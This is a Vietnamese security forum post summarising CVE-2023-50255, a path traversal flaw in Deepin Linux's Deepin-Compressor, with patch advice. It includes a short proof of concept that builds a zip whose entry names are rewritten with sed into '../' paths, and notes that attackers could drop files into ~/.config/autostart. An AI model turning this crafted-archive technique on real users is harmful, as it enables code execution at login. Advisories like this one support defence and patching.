CVE-2023-50255: lỗ hổng trong trình quản lý tệp nén của Deepin Linux

WhiteHat Team

Administrators
Thành viên BQT
09/04/2020
85
554 bài viết
CVE-2023-50255: lỗ hổng trong trình quản lý tệp nén của Deepin Linux
Deepin-Compressor, trình quản lý tệp nén mặc định cho hệ điều hành Deepin Linux, đang tồn tại lỗ hổng path traversal. Lỗ hổng được gán mã định danh CVE-2023-50255, điểm CVSS ở mức cao 8,2.

Deepin_Linux.png

CVE này xuất hiện trong quá trình giải nén tệp zip. Trình quản lý tệp nén thường phải xác thực tên tệp nhằm ngăn chặn truy cập trái phép vào hệ thống. Tuy nhiên, Deepin-compressor không làm được điều đó, tạo điều kiện cho kẻ tấn công có thể khai thác lỗ hổng này bằng cách thêm tiền tố “../” vào tên tệp.

Khai thác thành công lỗ hổng, kẻ tấn công có thể chèn các mã độc hại vào thư mục ~/.config/autostart. Hành động này cho phép thực thi mã từ xa mỗi khi khi hệ thống đích khởi động.

Mã khai thác​

Các bước để khai thác CVE-2023-50255:
  • Bước 1: Tạo một tệp tin mẫu
Mã:
echo “TEST” > XXYXXYXXYtmpYpoc.txt
  • Bước 2: Tạo một tệp zip bình thường
Mã:
zip poc.zip XXYXXYXXYtmpYpoc.txt
  • Bước 3: Biến tệp zip thành tệp độc hại
Mã:
sed -i s/”XXY”/”..\/”/g poc.zip
sed -i s/”tmpY”/”tmp\/”/g poc.zip

Mỗi khi giải nén với Deepin-compressor, tệp tin mẫu với tên poc.txt sẽ được tạo ở thư mục /tmp.

Lỗ hổng này ảnh hưởng đến Deepin-compressor trước phiên bản 5.12.21. Người dùng Deepin Linux, đặc biệt là những người sử dụng phiên bản Deepin-compressor bị ảnh hưởng, nên cập nhật lên phiên bản mới nhất ngay lập tức.

Ngoài ra, Người dùng được khuyến cáo cần cảnh giác và cập nhật hệ thống của họ để được bảo vệ khỏi những lỗ hổng tương tự.

Nguồn: Security Online
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Thẻ
cve-2023-50255 deepin linux deepin-compressor
Bên trên